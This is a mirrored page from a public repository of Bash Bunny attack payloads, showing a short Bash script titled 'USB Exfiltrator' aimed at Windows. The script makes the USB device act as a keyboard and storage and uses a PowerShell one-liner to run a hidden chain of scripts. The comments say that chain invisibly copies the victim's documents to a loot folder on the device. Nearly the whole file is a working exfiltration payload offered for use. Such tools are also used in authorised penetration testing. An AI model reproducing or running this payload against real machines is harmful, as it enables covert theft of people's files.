mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
19 lines
606 B
Bash
19 lines
606 B
Bash
#!/bin/bash
|
|
#
|
|
# Title: USB Exfiltrator
|
|
# Author: Hak5Darren
|
|
# Version: 1.1
|
|
# Target: Windows XP SP3+
|
|
# Props: Diggster, IMcPwn
|
|
# Category: Exfiltration
|
|
#
|
|
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
|
|
# which in turn executes e.cmd invisibly using i.vbs
|
|
# which in turn executes and if stated, copies documents to the loot folder on the Bash Bunny.
|
|
#
|
|
|
|
LED ATTACK
|
|
ATTACKMODE HID STORAGE
|
|
RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
|
|
LED FINISH
|